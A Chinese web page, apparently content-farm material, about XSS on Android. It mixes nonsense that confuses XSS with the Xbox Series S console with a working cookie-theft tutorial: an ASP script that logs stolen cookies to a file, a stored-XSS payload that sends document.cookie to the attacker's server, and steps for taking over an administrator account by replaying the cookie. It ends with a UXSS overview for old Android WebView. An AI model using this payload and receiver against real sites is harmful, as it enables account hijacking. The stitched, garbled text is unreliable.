安卓上xss代码（xss开发者）

怎么用手机玩xss

手机下载xboxapp，手柄蓝牙连接手机即可。

这个游戏是Google提供的一个XSS的小游戏，大家可以自己在浏览器里试试看能不能闯过所有的关卡可以通过研究TargetCode来找到可以注入代码的地方，如果想不出来可以看看页面上的Hints。

XSS体积小，画质比PS3强多了，帧数基本都能稳定在60，读取超快，切换游戏自如。

怎么用xss代码让cookie弹窗

XSS获取cookie并利用

获取cookie利用代码cookie.asp

html

titlexx/title

body

%testfile = Server.MapPath('code.txt') //先构造一个路径，也就是取网站根目录，创造一个在根目录下的code.txt路径，保存在testfile中

msg = Request('msg') //获取提交过来的msg变量，也就是cookie值

set fs = server.CreateObject('scripting.filesystemobject')//创建一个fs对象

set thisfile = fs.OpenTextFile(testfile,8,True,0)

thisfile.WriteLine(''msg'')//像code.txt中写入获取来的cookie

thisfile.close() //关闭

set fs = nothing%

/body

/html

把上述文件保存为cookie.asp文件，放到你自己的网站服务器下。比如这里我们自己搭建的服务器为：。

XSS构造语句

scriptwindow.open(''+document.cookie)/script

把上述语句放到你找到的存在XSS的目标中，不过这里更好是存储型xss，比如你找到了某个博客或者论坛什么的存在存储型XSS，你在里面发一篇帖子或者留上你的评论，内容就是上述语句，当其他用户或者管理员打开这个评论或者帖子链接后，就会触发，然后跳转到'+document.cookie的页面，然后当前账户的coolie信息就当成参数发到你的网站下的文件里了。然后的然后你就可以那这个cookie登陆了。。。。。。

简单步骤如下：

1、在存在漏洞的论坛中发日志：

X

2、然后以管理远登陆，进入后页面会跳转，此时cookie就发送到你的服务器下的code.txt文件中了：

3、这是没有账户前的登陆界面：

4、打开firefox的Tamper Data插件，点击Start Tamper开始抓取信息，刷新登陆界面，然后会跳出对话框，点击Tamper按钮，在途中的cookie一栏中替换掉你抓取到的cookie，单击确定发送请求数据：

5、替换cookie后不用输用户名密码就顺利进入管理员账户了：

为什么我说 Android 很糟糕

Android 的安全问题一直被吐槽，包括不安全的APP市场、上次的远程命令执行漏洞、还有它的权限机制，总之一团糟，这些还是可以忍的，APP市场总是在规范化，大的漏洞很快就会被应急，权限问题也在慢慢改善。

今天要说的是一个 Android 下很有生命力的漏洞，刚刚提到的远程命里执行漏洞也是把所有涉及到浏览器的应用给走了一遍，包括 *** 、微博、UC浏览器，这次要说的也是关于浏览器的漏洞，叫 UXSS。

首先科普下 UXSS 和 WebView

通俗的说下

UXSS：当你访问 A 网站的时候A网站可以跨域获取你在 B 网站的一切信息。

WebView：安卓浏览器的浏览器组件，做网页展示都需要用到它。

他们是什么关系呢？

Webview 的底层的是 webkit，但是是比较老的 webkit。

这就出现一个问题， 大家用老版本的东西的时候可能是想着稳定性，还要注意一点的就是安全性，漏洞补丁往往是随着应用升级一起发布的。

老版本的 webkit 存在大量的已披露 UXSS 漏洞（即 POC 公开）。

再说说 UXSS 的攻击流程

正常情况下我们会访问各种各样的网站，比如我常上的网站是知乎和乌云。

如果有一天，邪恶的剑心想通过 UXSS 漏洞攻击我的知乎账户，那么他只要在乌云的网站中插入一段 *** 执行 UXSS 漏洞代码即可劫持我知乎账户的 session。

正常用户==request== wooyun.org

==script exec == uxss.js

uxss.js ==bypass SOP== zhihu.com

done,session get!

不只是浏览器，还包括 微信、 *** 、微博等所有涉及网页浏览的应用。

手机 *** 安卓版两处跨域问题

上面这个漏洞，可以直接在任意一个网页中插入上面漏洞的代码，发给好友 URL，就可以获得她的 *** 权限。

UC浏览器Android最新版(4.4)跨域漏洞(不受系统版本限制)

再看来这个，是浏览器的，平时我们会使用手机浏览器登陆很多网站，这样更有利于攻击，可以直接一次攻击获得你所有登陆过的网站的身份。

还有很多，这些都是由于 webkit 版本低造成的。